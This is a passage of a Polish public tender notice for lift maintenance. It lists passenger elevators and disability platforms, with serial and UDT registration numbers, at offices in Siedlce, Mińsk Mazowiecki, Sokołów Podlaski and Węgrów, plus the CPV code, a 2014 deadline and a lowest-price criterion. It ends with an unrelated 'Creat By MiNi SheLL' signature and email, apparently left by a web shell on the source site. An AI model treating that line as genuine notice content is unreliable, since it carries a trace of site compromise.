Oddział Siedlce, ul. Browarna 12
1.1. dźwig osobowy hydrauliczny, typ H600AA MACPUARSA - ZARAGOZA, nr fabryczny ZX71478
- producent Macpuarsa, rok produkcji 2000
- nr rejestracyjny UDT3123000328
- udźwig 600 kg,  ilość przystanków 5
- 1 szt

1.2. platforma dla osób niepełnosprawnych, typ T80   Lippe Lift, nr fabryczny 15182
- producent LIPPE LIFT -UND ANLAGENBAU GMBH, rok produkcji 2006
- nr rejestracyjny UDT 3023000107
- udźwig 225 kg, ilość przystanków 1
- 1 szt

1.3.	platforma dla osób niepełnosprawnych, typ T100 Lippe Lift, nr fabryczny T-02254
- producent LIPPE LIFT -UND ANLAGENBAU GMBH, rok produkcji 2006
 - nr rejestracyjny UDT3023000108
 - udźwig 225 kg, ilość przystanków 1
 - 1 szt

1.4.	platforma dla osób niepełnosprawnych, typ T100 Lippe Lift, nr fabryczny KL-00170
-	producent LIPPE LIFT -UND ANLAGENBAU GMBH, rok produkcji 2006
-	nr rejestracyjny UDT 3023000109,
-	udźwig 300 kg, ilość przystanków 1
-	1 szt 

2.	Lokalizacja:

Inspektorat Mińsk Mazowiecki, ul. Warszawska 84
2.1.	 dźwig osobowy elektryczny, typ SMART MRL 002, nr fabryczny WAW 00467
- producent SCHINDLER, rok produkcji 2003
- nr rejestracyjny UDT 3123065688
- udźwig 630 kg, ilość przystanków 3
- 1 szt





3. Lokalizacja :

Inspektorat Sokołów Podlaski, ul. Piłsudskiego 2
3.1. dźwig osobowy hydrauliczny, typ HOG630-T2/T2-N, nr fabryczny 61497
- producent BOLĘCIN, rok produkcji 2010
- nr rejestracyjny UDT 3123065929
- udźwig 630 kg, ilość przystanków 4
- 1 szt	

4.Lokalizacja:

 Biuro Terenowe Węgrów, ul. Wieniawskiego 15
4.1. dźwig osobowy hydrauliczny, typ HOG630-T2/T2-N, nr fabryczny 62135
- producent BOLĘCIN, rok produkcji 2012
- nr rejestracyjny UDT 3123066048
- udźwig 630 kg, ilość przystanków 4
- 1szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com